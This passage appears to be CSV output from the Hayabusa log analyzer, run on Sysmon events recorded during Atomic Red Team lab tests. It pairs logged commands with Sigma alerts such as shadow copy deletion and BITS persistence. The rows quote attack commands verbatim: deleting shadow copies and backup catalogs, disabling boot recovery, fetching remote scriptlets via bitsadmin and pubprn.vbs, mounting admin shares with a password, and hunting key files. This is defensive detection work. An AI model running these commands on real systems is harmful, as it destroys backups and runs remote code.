powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:40.691 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: vssadmin.exe delete shadows /all /quiet : Path: C:\Windows\System32\vssadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,critical,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:40.863 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wbadmin.exe delete catalog -quiet : Path: C:\Windows\System32\wbadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.773 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wbengine.exe"" : Path: C:\Windows\System32\wbengine.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:45.958 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\vds.exe : Path: C:\Windows\System32\vds.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:46.112 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.816 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures : Path: C:\Windows\System32\bcdedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,high,Modification of Boot Configuration,,rules/sigma/process_creation/win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bcdedit.exe /set {default} recoveryenabled no : Path: C:\Windows\System32\bcdedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,high,Modification of Boot Configuration,,rules/sigma/process_creation/win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:52.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:57.227 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sdelete.exe C:\some\file.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:47:57.274 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:04.103 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:04.131 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:05.365 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /create AtomicBITS : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.799 +09:00,MSEDGEWIN10,1,medium,Monitoring For Persistence Via BITS,,rules/sigma/process_creation/win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Monitoring For Persistence Via BITS,,rules/sigma/process_creation/win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.917 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1 : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.041 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /complete AtomicBITS : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.134 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.157 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /resume AtomicBITS : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.240 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:36.834 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:36.882 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:37.264 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:41.050 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:41.085 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,medium,Mounted Windows Admin Shares with net.exe,,rules/sigma/process_creation/win_net_use_admin_share.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:46.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""echo "" ""ATOMICREDTEAM > %%windir%%\cert.key"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /S /D /c"" dir c:\ /b /s .key "" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: findstr /e .key : Path: C:\Windows\System32\findstr.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:31.690 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.150 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.227 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.304 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query 